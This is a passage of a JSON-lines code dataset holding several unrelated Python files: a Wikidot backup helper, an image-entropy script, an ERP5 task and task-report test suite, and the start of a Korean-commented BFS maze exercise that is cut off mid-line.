hyphens.\n # (We need to do better here!)\n return name.replace(\"-\", \"\")\n\n\n# *****************************************************************\n# Is the page a redirect? 
If yes, return the cannonicized redirect; if not, return null\n# A redirect is of the form [[module Redirect destination=\"\"]]\n# We want to return the cannonicized destination or None if it is not a redirect\ndef IsRedirect(pageText):\n pageText = pageText.strip() # Remove leading and trailing whitespace\n if pageText.lower().startswith('[[module redirect destination=\"') and pageText.endswith('\"]]'):\n return Cannonicize(pageText[31:].rstrip('\"]'))\n return None\n\n\n# *****************************************************************\n# Should this filename be ignored?\n# Return value is either the cleaned filename or None if the file should be ignored.\ndef InterestingFilenameZip(filenameZip):\n\n if not filenameZip.startswith(\"source/\"): # We're only interested in source files\n return None\n if len(filenameZip) <= 11: # There needs to be something there besides 'source/.txt'\n return None\n\n # These files are specific to Fancyclopedia and are known to be ignorable\n if filenameZip.startswith(\"source/index_people\"): # Pages with names \"source/index_people...\" are index pages, not content pages.\n return None\n if filenameZip.startswith(\"source/index_alphanumeric\"): # Likewise\n return None\n if filenameZip.startswith(\"source/testing_alphanumeric\"): # Likewise\n return None\n\n return filenameZip[7:-4] # Drop \"source/\" and \".txt\", returning the cleaned name\n\n\n# *****************************************************************\n# Read a source file from a zipped Wikidot backup\ndef ReadPageSourceFromZip(zip, filename):\n\n if InterestingFilenameZip(filename) == None:\n return None\n\n source = zip.read(filename).decode(\"utf-8\")\n if source == None:\n print(\"error: '\" + filename + \"' read as None\")\n exit\n return source\n\n# *****************************************************************\n# Convert the filename in a zipped Wikidot backup (which uses \"_\" to indicate a category) to use a Wikidot \":\" category indicator\n# Change : to _\ndef ConvertZipCategoryMarker(name):\n return name.replace(\":\", \"_\", 1)","repo_name":"bodekerscientific/wikidot_tools","sub_path":"WikidotHelpers.py","file_name":"WikidotHelpers.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"5824295870","text":"import cv2\nimport numpy as np\n\n# image loaded\nbgr_img1 = cv2.imread('../lena.png')\nbgr_img2 = cv2.imread('../northcap.png')\n\n# switch bgr --> grb\nrgb_img1 = cv2.cvtColor(bgr_img1, cv2.COLOR_BGR2RGB)\nrgb_img2 = cv2.cvtColor(bgr_img2, cv2.COLOR_BGR2RGB)\n\n# calculate number of pixels\npixels_img1 = rgb_img1.shape[0]*rgb_img1.shape[1]\npixels_img2 = rgb_img2.shape[0]*rgb_img2.shape[1]\n\n# calculate histogram for each color\ncolors = ('R', 'G', 'B')\n# variables for holding the R, G, B entropy values for each image\nentropy_img1 = [0, 0, 0]\nentropy_img2 = [0, 0, 0]\n\n# for each color\nfor i, color in enumerate(colors):\n # calculate the histogram for each of the i channels\n hist_img1 = cv2.calcHist([rgb_img1], [i], None, [256], [0, 256])\n hist_img2 = cv2.calcHist([rgb_img2], [i], None, [256], [0, 256])\n\n # calculate entropy for R\n for value in hist_img1:\n # to avoid undefined log behaviour\n if value != 0:\n added_entropy = (value/pixels_img1) * (np.log2(value/pixels_img1))\n entropy_img1[i] += added_entropy\n entropy_img1[i] *= (-1)\n\n for value in hist_img2:\n # to avoid undefined log behaviour\n if value != 0:\n added_entropy = (value/pixels_img2) * 
(np.log2(value/pixels_img2))\n entropy_img2[i] += added_entropy\n entropy_img2[i] *= (-1)\n\nprint(entropy_img1)\nprint(entropy_img2)\n","repo_name":"sivansha/image-processing","sub_path":"image-processing/code/q2_d.py","file_name":"q2_d.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71243916083","text":"import unittest\n\nfrom Products.ERP5Type.tests.ERP5TypeTestCase import ERP5TypeTestCase\nfrom AccessControl.SecurityManagement import newSecurityManager\nfrom DateTime import DateTime\nfrom Products.ERP5Type.Core.Workflow import ValidationFailed\nfrom Products.ERP5Type.tests.Sequence import SequenceList, Sequence\n\nclass TestTaskMixin:\n\n default_quantity = 99.99999999\n default_price = 555.88888888\n person_portal_type = 'Person'\n organisation_portal_type = 'Organisation'\n resource_portal_type = 'Service'\n project_portal_type = 'Project'\n requirement_portal_type = 'Requirement'\n requirement_document_portal_type = 'Requirement Document'\n task_portal_type = 'Task'\n task_description = 'Task Description %s'\n task_line_portal_type = 'Task Line'\n task_report_portal_type = 'Task Report'\n task_report_line_portal_type = 'Task Report Line'\n datetime = DateTime()\n task_workflow_id='task_workflow'\n business_process = 'business_process_module/erp5_default_business_process'\n\n default_task_sequence = '\\\n stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateProject \\\n stepCreateRequirement \\\n stepCreateSimpleTask \\\n stepCreateCurrency \\\n stepFillTaskWithData \\\n stepSetTaskPriceCurrency \\\n stepConfirmTask \\\n stepTic \\\n stepSetTaskReport '\n\n default_task_no_price_sequence = '\\\n stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateProject \\\n stepCreateRequirement \\\n stepCreateSimpleTask \\\n stepFillTaskWithData \\\n stepConfirmTask \\\n stepTic \\\n stepSetTaskReport '\n\n\n default_task_sequence_two_lines = '\\\n stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateResource \\\n stepCreateProject \\\n stepCreateSimpleTask \\\n stepCreateCurrency \\\n stepFillTaskWithData \\\n stepSetTaskPriceCurrency \\\n stepCreateTaskLine \\\n stepFillTaskLineWithData \\\n stepConfirmTask \\\n stepTic \\\n stepSetTaskReport '\n\n default_task_report_sequence = '\\\n stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateProject \\\n stepCreateSimpleTaskReport \\\n stepCreateCurrency \\\n stepFillTaskReportWithData \\\n stepSetTaskReportPriceCurrency \\\n stepCreateTaskReportLine '\n\n def getBusinessTemplateList(self):\n \"\"\"\n \"\"\"\n return ('erp5_base','erp5_pdm', 'erp5_simulation', 'erp5_trade',\n 'erp5_project', 'erp5_simulation_test',\n 'erp5_configurator_standard_solver',\n 'erp5_simulation_test_trade_template',\n 'erp5_core_proxy_field_legacy')\n\n# def stepLogin(self, **kw):\n# portal = self.getPortal()\n# uf = portal.acl_users\n# if not uf.getUserById('dummy'):\n# import transaction\n# uf._doAddUser('manager', '', ['Manager'], [])\n# self.loginByUserName('manager')\n# person_module = portal.getDefaultModule(self.person_portal_type)\n# person = person_module.newContent(id='dummy', title='dummy',\n# reference='dummy')\n# portal.portal_categories.group.newContent(id='dummy',\n# codification='DUMMY')\n#\n# assignment = person.newContent(title='dummy', 
group='dummy',\n# portal_type='Assignment',\n# start_date='1980-01-01',\n# stop_date='2099-12-31')\n# assignment.open()\n# transaction.commit()\n# self.tic()\n# module_list = []\n# portal_type_list = []\n# for portal_type in (self.resource_portal_type,\n# self.project_portal_type,\n# self.requirement_document_portal_type,\n# self.organisation_portal_type,\n# self.task_portal_type,\n# self.task_report_portal_type,\n# self.category_portal_type,):\n# module = portal.getDefaultModule(portal_type)\n# module_list.append(module)\n# portal_type_list.append(portal_type)\n# portal_type_list.append(module.getPortalType())\n#\n# for portal_type in portal_type_list:\n# ti = portal.portal_types[portal_type]\n# ti.addRole('Auditor;Author;Assignee;Assignor', '', 'Dummy',\n# '', 'group/dummy', 'ERP5Type_getSecurityCategoryFromAssignment',\n# '')\n# ti.updateRoleMapping()\n#\n# transaction.commit()\n# self.tic()\n# portal.portal_caches.clearAllCache()\n#\n# self.loginByUserName('dummy')\n def stepLogin(self, quiet=0, run=1, **kw):\n uf = self.getPortal().acl_users\n uf._doAddUser('alex', '', ['Manager', 'Assignee', 'Assignor',\n 'Associate', 'Auditor', 'Author'], [])\n user = uf.getUserById('alex').__of__(uf)\n newSecurityManager(None, user)\n\n def stepCreateResource(self,sequence=None, sequence_list=None, \\\n **kw):\n \"\"\"\n Create a resource_list with no variation\n \"\"\"\n resource_list = sequence.get('resource_list', [])\n portal = self.getPortal()\n resource_module = portal.getDefaultModule(self.resource_portal_type)\n resource = resource_module.newContent(\n portal_type=self.resource_portal_type,\n title = 'Resource%s' % len(resource_list),\n )\n resource_list.append(resource)\n sequence.edit(resource_list=resource_list)\n\n def stepCreateProject(self,sequence=None, sequence_list=None, \\\n **kw):\n \"\"\"\n Create a project\n \"\"\"\n portal = self.getPortal()\n module = portal.getDefaultModule(self.project_portal_type)\n obj = module.newContent(\n portal_type=self.project_portal_type,\n title = 'Project',\n )\n sequence.edit(project=obj)\n\n def stepCreateRequirement(self,sequence=None, sequence_list=None, \\\n **kw):\n \"\"\"\n Create a requirement\n \"\"\"\n portal = self.getPortal()\n module = portal.getDefaultModule(self.requirement_document_portal_type)\n obj = module.newContent(\n portal_type=self.requirement_document_portal_type,\n title = 'Requirement Document',\n )\n subobj = obj.newContent(\n portal_type=self.requirement_portal_type,\n title = 'Requirement',\n )\n sequence.edit(requirement=subobj)\n\n def stepCreateOrganisation(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create a empty organisation\n \"\"\"\n organisation_list = sequence.get('organisation_list', [])\n portal = self.getPortal()\n organisation_module = portal.getDefaultModule(\n portal_type=self.organisation_portal_type)\n organisation = organisation_module.newContent(\n portal_type=self.organisation_portal_type,\n title='Organization%s' % len(organisation_list),\n )\n organisation_list.append(organisation)\n sequence.edit(organisation_list=organisation_list)\n\n def stepCreateSimpleTask(self,sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create a task and fill it with dummy data.\n \"\"\"\n task_module = self.portal.getDefaultModule(\n portal_type=self.task_portal_type)\n task = task_module.newContent(\n portal_type=self.task_portal_type,\n title=str(self),\n description=\"This is a very simple task. 
You can do it quickly.\",\n specialise=self.business_process)\n # Check if no task lines are created at the start\n self.assertEqual(len(task.contentValues()), 0)\n sequence.edit(task=task)\n\n def stepCreateCurrency(self, sequence, **kw) :\n \"\"\"Create a default currency. \"\"\"\n currency_module = self.getCurrencyModule()\n if len(currency_module.objectValues(id='EUR'))==0:\n currency = self.getCurrencyModule().newContent(\n portal_type='Currency',\n id=\"EUR\",\n base_unit_quantity=0.01,\n )\n else:\n currency = currency_module.objectValues(id='EUR')[0]\n sequence.edit(currency=currency)\n\n def stepSetTaskPriceCurrency(self, sequence, **kw) :\n \"\"\"Set the price currency of the task.\n\n TODO : include a test with this step late.\n \"\"\"\n currency = sequence.get('currency')\n task = sequence.get('task')\n task.setPriceCurrency(currency.getRelativeUrl())\n\n def stepSetTaskValues(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Fill created task with some necessary data.\n \"\"\"\n task = sequence.get('task')\n project = sequence.get('project')\n organisation_list = sequence.get('organisation_list')\n organisation1 = organisation_list[0]\n organisation2 = organisation_list[1]\n task.edit(source_value=organisation1,\n source_section_value=organisation1,\n destination_value=organisation2,\n destination_section_value=organisation2,\n source_project_value=project,\n destination_project_value=project,\n description=self.task_description % task.getId(),\n start_date = self.datetime + 10,\n stop_date = self.datetime + 20,)\n sequence.edit( task = task)\n\n def stepFillTaskWithData(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Fill created task with some necessary data.\n \"\"\"\n self.stepSetTaskValues(sequence=sequence,\n sequence_list=sequence_list, **kw)\n task = sequence.get('task')\n resource = sequence.get('resource_list')[0]\n requirement = sequence.get('requirement')\n task.edit(task_line_resource_value = resource,\n task_line_quantity = self.default_quantity,\n task_line_price = self.default_price,\n task_line_requirement_value = requirement,\n task_line_description = 'Default Task Line Description',\n )\n\n def stepCreateSimpleTaskReport(self,sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create a task report.\n \"\"\"\n task_report_module = self.portal.getDefaultModule(\n portal_type=self.task_report_portal_type)\n task_report = task_report_module.newContent(\n portal_type=self.task_report_portal_type,\n title=str(self),\n specialise=self.business_process)\n # Check if no task lines are created at the start\n self.assertEqual(len(task_report.contentValues()), 0)\n sequence.edit(task_report = task_report)\n\n def stepFillTaskReportWithData(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Fill created task report with some necessary data.\n \"\"\"\n task_report = sequence.get('task_report')\n organisation_list = sequence.get('organisation_list')\n organisation1 = organisation_list[0]\n organisation2 = organisation_list[1]\n project = sequence.get('project')\n task_report.edit(source_value=organisation1,\n source_section_value=organisation1,\n destination_value=organisation1,\n destination_section_value=organisation2,\n source_project_value=project,\n destination_project_value=project,\n start_date = self.datetime + 10,\n stop_date = self.datetime + 20,)\n sequence.edit( task_report = task_report)\n\n def stepSetTaskReportPriceCurrency(self, sequence, **kw) :\n \"\"\"Set the price currency of the task.\n\n This step is not necessary.\n TODO 
: - include a test without this step.\n - include a test with this step late.\n \"\"\"\n currency = sequence.get('currency')\n task_report = sequence.get('task_report')\n task_report.setPriceCurrency(currency.getRelativeUrl())\n\n def stepCreateTaskReportLine(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create task report line and fill with dummy data.\n \"\"\"\n resource = sequence.get('resource_list')[0]\n task_report = sequence.get('task_report')\n task_report_line = task_report.newContent(\n portal_type=self.task_report_line_portal_type)\n task_report_line.edit( title = 'New Task Report Line',\n resource_value = resource,\n quantity = self.default_quantity,\n price = self.default_price)\n sequence.edit(task_report_line = task_report_line)\n\n def stepVerifyGeneratedByBuilderTaskReport(self, sequence=None,\n sequence_list=None, **kw):\n \"\"\"\n Verify that simulation generated report is correct.\n \"\"\"\n task = sequence.get('task')\n task_report = sequence.get('task_report')\n self.assertEqual('confirmed', task_report.getSimulationState())\n self.assertEqual(task.getSource(), task_report.getSource())\n self.assertEqual(task.getSourceSection(), task_report.getSourceSection())\n self.assertEqual(task.getSourceProject(), task_report.getSourceProject())\n self.assertEqual(task.getDestination(), task_report.getDestination())\n self.assertEqual(task.getDestinationSection(),\n task_report.getDestinationSection())\n self.assertEqual(task.getDestinationDecision(),\n task_report.getDestinationDecision())\n self.assertEqual(task.getTitle(),\n task_report.getTitle())\n self.assertEqual(task.getDescription(),\n task_report.getDescription())\n self.assertEqual(task.getPredecessor(), task_report.getPredecessor())\n self.assertEqual(task.getDescription(), task_report.getDescription())\n self.assertEqual(task.getPriceCurrency(), task_report.getPriceCurrency())\n self.assertEqual(len(task_report.contentValues()), 1)\n task_report_line = task_report.contentValues()[0]\n self.assertEqual(task.getTaskLineResource(), task_report_line.getResource())\n self.assertEqual(task.getTaskLineQuantity(), task_report_line.getQuantity())\n self.assertEqual(task.getTaskLinePrice(), task_report_line.getPrice())\n self.assertEqual(task.getTaskLineRequirement(),\n task_report_line.getRequirement())\n\n def stepCreateTaskLine(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create task line and fill with dummy data.\n \"\"\"\n task = sequence.get('task')\n task_line = task.newContent(\n portal_type=self.task_line_portal_type,\n title='New Task Line',\n description='New Task Line Description')\n sequence.edit(task_line=task_line)\n\n def stepFillTaskLineWithData(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Fill task line with dummy data.\n \"\"\"\n organisation = sequence.get('organisation_list')[0]\n resource1 = sequence.get('resource_list')[1]\n task_line = sequence.get('task_line')\n task_line.edit(\n source_value=organisation,\n resource_value=resource1,\n quantity=self.default_quantity,\n price=self.default_price)\n\n def stepVerifyGeneratedTaskReportLines(self, sequence=None,\n sequence_list=None, **kw):\n \"\"\"\n Verify that simulation generated report is correct.\n \"\"\"\n task = sequence.get('task')\n task_report = sequence.get('task_report')\n task_content_list = task.contentValues()\n self.assertNotEqual(len(task_content_list), 0)\n self.assertEqual(len(task_report.contentValues()),\n len(task_content_list))\n\n # Task report values not tested\n # XXX\n # Task line not 
precisely tested\n for task_line in task_content_list:\n task_report_resource_list = \\\n [line.getResource() for line in task_report.contentValues()]\n task_report_quantity_list = \\\n [line.getQuantity() for line in task_report.contentValues()]\n task_report_price_list = \\\n [line.getPrice() for line in task_report.contentValues()]\n self.assertIn(task_line.getResource(), task_report_resource_list)\n self.assertIn(task_line.getQuantity(), task_report_quantity_list)\n self.assertIn(task_line.getPrice(), task_report_price_list)\n\n for task_report_line in task_report.contentValues(portal_type='Task Report Line'):\n simulation_movement = task_report_line.getDeliveryRelatedValue()\n task_line = simulation_movement.getDeliveryValue()\n self.assertTrue(task_line.getDescription())\n self.assertEqual(task_line.getDescription(),\n task_report_line.getDescription())\n\n def stepAssertDraftCausalityState(self, sequence=None,\n sequence_list=None, **kw):\n \"\"\"\n Verify that confirmed task report starts building and gets solved.\n \"\"\"\n task_report = sequence.get('task_report')\n self.assertEqual(task_report.getCausalityState(), 'draft')\n\n def stepVerifyTaskReportNoPrice(self, sequence=None,\n sequence_list=None, **kw):\n task_report = sequence.get('task_report')\n self.assertEqual(None, task_report.getPriceCurrency())\n self.assertEqual(1, len(task_report.getMovementList()))\n task_report_line = task_report.getMovementList()[0]\n self.assertEqual(None, task_report_line.getPrice())\n\n def modifyState(self, object_name, transition_name, sequence=None,\n sequence_list=None):\n object_value = sequence.get(object_name)\n workflow_method = getattr(object_value, transition_name)\n workflow_method()\n\n def stepConfirmTask(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task', 'confirm', sequence=sequence)\n\n def stepConfirmTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'confirm', sequence=sequence)\n\n def stepStartTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'start', sequence=sequence)\n\n def stepFinishTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'stop', sequence=sequence)\n\n def stepCloseTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'deliver', sequence=sequence)\n\n def stepRestartTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'restart', sequence=sequence)\n\n def stepSetTaskReport(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Set task report object in sequence.\n \"\"\"\n task = sequence.get('task')\n task_report = task.getCausalityRelatedValueList(\n portal_type='Task Report')[0]\n sequence.edit(task_report=task_report)\n\n def stepVerifyMergedTaskLine(self, sequence=None,\n sequence_list=None, **kw):\n \"\"\"\n Verify that simulation generated report is correct.\n \"\"\"\n task = sequence.get('task')\n task_report = sequence.get('task_report')\n self.assertEqual('confirmed', task_report.getSimulationState())\n self.assertEqual(task.getSource(), task_report.getSource())\n self.assertEqual(task.getSourceSection(), task_report.getSourceSection())\n self.assertEqual(task.getSourceProject(), task_report.getSourceProject())\n self.assertEqual(task.getDestination(), task_report.getDestination())\n self.assertEqual(task.getDestinationSection(),\n task_report.getDestinationSection())\n self.assertEqual(task.getDestinationDecision(),\n 
task_report.getDestinationDecision())\n self.assertEqual(task.getTitle(),\n task_report.getTitle())\n self.assertEqual(task.getDescription(),\n task_report.getDescription())\n self.assertEqual(task.getPredecessor(), task_report.getPredecessor())\n self.assertEqual(task.getDescription(), task_report.getDescription())\n self.assertEqual(len(task_report.contentValues()), 2)\n for task_report_line in task_report.contentValues():\n self.assertEqual(task.contentValues()[0].getResource(),\n task_report_line.getResource())\n self.assertEqual(task.contentValues()[0].getQuantity(),\n task_report_line.getQuantity())\n self.assertEqual(task.contentValues()[0].getPrice(),\n task_report_line.getPrice())\n self.assertEqual(task.contentValues()[0].getRequirement(),\n task_report_line.getRequirement())\n\n def stepSetUpLedgerCategory(self, sequence=None, sequence_list=None, **kw):\n ledger = self.portal.portal_categories.ledger\n if not ledger.get('favourite_ledger', None):\n ledger.newContent(portal_type='Category', id='favourite_ledger')\n if not ledger.get('default_task_report_ledger', None):\n ledger.newContent(portal_type='Category',\n id='default_task_report_ledger')\n\n def stepSetDifferentDefaultLedgerForTaskandTaskReport(self, sequence=None,\n sequence_list=None, **kw):\n task_portal_type = self.portal.portal_types['Task']\n task_report_portal_type = self.portal.portal_types['Task Report']\n\n task_portal_type.edit(ledger='favourite_ledger')\n task_report_portal_type.edit(ledger=['default_task_report_ledger',\n 'favourite_ledger'])\n\n def stepCheckTaskReportLedgerIsSameAsTaskLedger(self, sequence=None,\n sequence_list=None, **kw):\n task = sequence.get('task')\n task_report = sequence.get('task_report')\n\n self.assertTrue(task.hasLedger())\n self.assertTrue(task_report.hasLedger())\n self.assertEqual(task.getLedger(), task_report.getLedger())\n\n def stepCheckTaskReportLedgerIsDifferentFromItsDefaultLedger(self,\n sequence=None, sequence_list=None, **kw):\n task_report = sequence.get('task_report')\n task_report_portal_type = self.portal.portal_types['Task Report']\n\n self.assertNotEqual(task_report.getLedger(),\n task_report_portal_type.getDefaultLedger())\n\nclass TestTask(TestTaskMixin, ERP5TypeTestCase):\n \"\"\"\n Test task behaviour.\n \"\"\"\n run_all_test = 1\n\n def afterSetUp(self):\n self.stepLogin()\n self.validateRules()\n self.tic()\n\n def getTitle(self):\n return \"Task\"\n\n def enableLightInstall(self):\n \"\"\"\n You can override this.\n Return if we should do a light install (1) or not (0)\n \"\"\"\n return 1\n\n def enableActivityTool(self):\n \"\"\"\n You can override this.\n Return if we should create (1) or not (0) an activity tool.\n \"\"\"\n return 1\n\n def beforeTearDown(self):\n # Removes default ledger on portal types if they exist\n self.portal.portal_types['Task'].setLedger(None)\n self.portal.portal_types['Task Report'].setLedger(None)\n\n def test_01_testTaskBasicUseCase(self, quiet=0, run=run_all_test):\n \"\"\"\n Test creation of task and (automatic) task_report\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = self.default_task_sequence + '\\\n stepVerifyGeneratedByBuilderTaskReport \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_01_testTaskNoPrice(self, quiet=0, run=run_all_test):\n \"\"\"\n Test creation of task and (automatic) task_report when no price is\n defined on the task\n \"\"\"\n if 
not run: return\n self.default_price = None\n sequence_list = SequenceList()\n sequence_string = self.default_task_no_price_sequence + '\\\n stepVerifyGeneratedByBuilderTaskReport \\\n stepVerifyTaskReportNoPrice \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_02_testMultipleLineTaskBasicUseCase(self, quiet=0, run=run_all_test):\n \"\"\"\n Test creation of task with multiple task lines \\\n and (automatic) creation of task_report.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = self.default_task_sequence_two_lines + '\\\n stepVerifyGeneratedTaskReportLines \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_03_testTaskReportBasicUseCase(self, quiet=0, run=run_all_test):\n \"\"\"\n Test creation of task report and task report lines.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = self.default_task_report_sequence + '\\\n stepConfirmTaskReport \\\n stepTic \\\n stepAssertDraftCausalityState \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_04_checkNotMergedTaskReportLine(self, quiet=0, run=run_all_test):\n \"\"\"\n Check that a task report can not be the created from a merged of multiple\n task lines.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = 'stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateResource \\\n stepCreateSimpleTask \\\n stepSetTaskValues \\\n stepCreateTaskLine \\\n stepFillTaskLineWithData \\\n stepCreateTaskLine \\\n stepFillTaskLineWithData \\\n stepConfirmTask \\\n stepTic \\\n stepSetTaskReport \\\n stepVerifyMergedTaskLine \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_05_testStrictSimulationSecurity(self, quiet=0, run=run_all_test):\n \"\"\"Test creation of task and (automatic) task_report with strict\n security in the simulation.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = self.default_task_sequence + '\\\n stepVerifyGeneratedByBuilderTaskReport \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n\n simulation_tool = self.getPortal().portal_simulation\n uf = self.getPortal().acl_users\n if not uf.getUserById('manager'):\n uf._doAddUser('manager', '', ['Manager'], [])\n self.loginByUserName('manager')\n try:\n simulation_tool.Base_setDefaultSecurity()\n self.logout()\n sequence_list.play(self)\n finally:\n self.loginByUserName('manager')\n for permission in simulation_tool.possible_permissions():\n simulation_tool.manage_permission(permission, roles=(), acquire=1)\n self.logout()\n\n def test_06_checkTaskReferenceOnCreationAndPaste(self, quiet=0, run=run_all_test):\n \"\"\"Tests that task reference is set upon creation and coping\"\"\"\n if not run: return\n self.stepLogin()\n task_module = self.portal.getDefaultModule(\n portal_type=self.task_portal_type)\n task = task_module.newContent(portal_type=self.task_portal_type,\n specialise=self.business_process)\n\n 
self.assertEqual(\n task.getReference(),\n 'T-%s'%(task.getId(),)\n )\n\n cb_data = task_module.manage_copyObjects(ids=[task.getId()])\n p_data = task_module.manage_pasteObjects(cb_data)\n\n new_task = task_module._getOb(p_data[0]['new_id'])\n\n self.assertEqual(\n new_task.getReference(),\n 'T-%s'%(new_task.getId(),)\n )\n\n def test_07_taskConstraints(self):\n \"\"\"Check tasks constraints\"\"\"\n self.stepLogin()\n portal = self.getPortal()\n portal_type = portal.portal_types['Task']\n original_property_sheet_list = portal_type.getTypePropertySheetList()\n try:\n sequence = Sequence(context=self)\n if not('TaskConstraint' in original_property_sheet_list):\n new_property_sheet_list = ['TaskConstraint'] + original_property_sheet_list\n portal_type.edit(type_property_sheet_list=new_property_sheet_list)\n self.commit()\n task_module = portal.getDefaultModule(portal_type=self.task_portal_type)\n task = task_module.newContent(portal_type=self.task_portal_type)\n doActionFor = self.portal.portal_workflow.doActionFor\n self.assertRaises(ValidationFailed, doActionFor, task,\n 'confirm_action')\n sequence('CreateOrganisation')\n sequence('CreateOrganisation')\n sequence('CreateResource')\n (source, destination) = sequence.get('organisation_list')\n check_result = task.checkConsistency()\n self.assertEqual(len(check_result), 4)\n task.setDestinationValue(destination)\n task.setSourceValue(source)\n check_result = task.checkConsistency()\n self.assertEqual(len(check_result), 2)\n task.setStartDate(DateTime())\n task.setStopDate(DateTime() + 1)\n check_result = task.checkConsistency()\n self.assertEqual(len(check_result), 1)\n resource = sequence.get('resource_list')[0]\n task.edit(task_line_resource_value = resource,\n task_line_quantity = self.default_quantity,\n task_line_price = self.default_price,\n )\n check_result = task.checkConsistency()\n self.assertEqual(len(check_result), 0)\n\n finally:\n portal_type.setTypePropertySheetList(original_property_sheet_list)\n\n def test_08_localBuild(self):\n sequence = Sequence(context=self)\n sequence(\"\"\"\n Login\n CreateOrganisation\n CreateOrganisation\n CreateResource\n CreateProject\n CreateRequirement\n CreateSimpleTask\n CreateCurrency\n FillTaskWithData\n SetTaskPriceCurrency\n Tic\n ConfirmTask\n \"\"\")\n self.tic(stop_condition=lambda message_list: all(\n m.method_id != '_updateSimulation' for m in message_list))\n rar, = sequence['task'].getCausalityRelatedValueList()\n sm, = rar.objectValues()\n q = self.portal.cmf_activity_sql_connection.manage_test\n q('update message set processing_node=-4'\n ' where method_id=\"_localBuild\" or path=%r' % sm.getPath())\n self.commit()\n self.portal.portal_activities.process_timer(None, None)\n q('update message set processing_node=-1,'\n ' priority=method_id!=\"_localBuild\"')\n sequence(\"Tic SetTaskReport\")\n\n def test_09_testTaskLedgerIsInheritedByTaskReport(self, quiet=0, run=run_all_test):\n \"\"\"\n Test that a task and its related task report generated by simulation have\n the same ledger, even if the ledger set on the task is not the same as the\n default one set on the \"Task Report\" portal type.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = \"\"\"\n SetUpLedgerCategory\n SetDifferentDefaultLedgerForTaskandTaskReport\n \"\"\"\n\n sequence_string += self.default_task_sequence\n\n sequence_string += \"\"\"\n CheckTaskReportLedgerIsSameAsTaskLedger\n CheckTaskReportLedgerIsDifferentFromItsDefaultLedger\n \"\"\"\n\n 
sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestTask))\n return suite\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_project/TestTemplateItem/portal_components/test.erp5.testTask.py","file_name":"test.erp5.testTask.py","file_ext":"py","file_size_in_byte":32825,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"71781097203","text":"\"\"\"\n 문제\n\n 사용자는 N X M 크기의 직사각형 형태의 미로에 갇힘. 미로에는 여러 마리의 괴물이 있어 이를 피해 탈출해야 함.\n\n 사용자의 위치는 (1, 1)이며 미로의 출구는 (N, M)의 위치에 존재하며 한 번에 한 칸씩 이동할 수 있음.\n 이때 괴물이 있는 부분은 0으로, 괴물이 없는 부분은 1로 표시되어 있음. 미로는 반드시 탈출할 수 있는 형태로 제시됨.\n\n 이때 사용자가 탈출하기 위해 움직여야 하는 최소 칸의 개수를 구하시오. 칸을 셀 때는 시작 칸과 마지막 칸을 모두 포함해서 계산함.\n\n 입력 예시\n 5 6\n 101010\n 111111\n 000001\n 111111\n 111111\n\"\"\"\nfrom collections import deque\n\nn, m = map(int, input().split())\ngraph = []\nfor _ in range(n):\n row = list(map(int, input()))\n graph.append(row)\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, 1, -1]\n\n\ndef bfs(x, y):\n queue = deque()\n queue.append((x, y))\n\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx <= -1 or 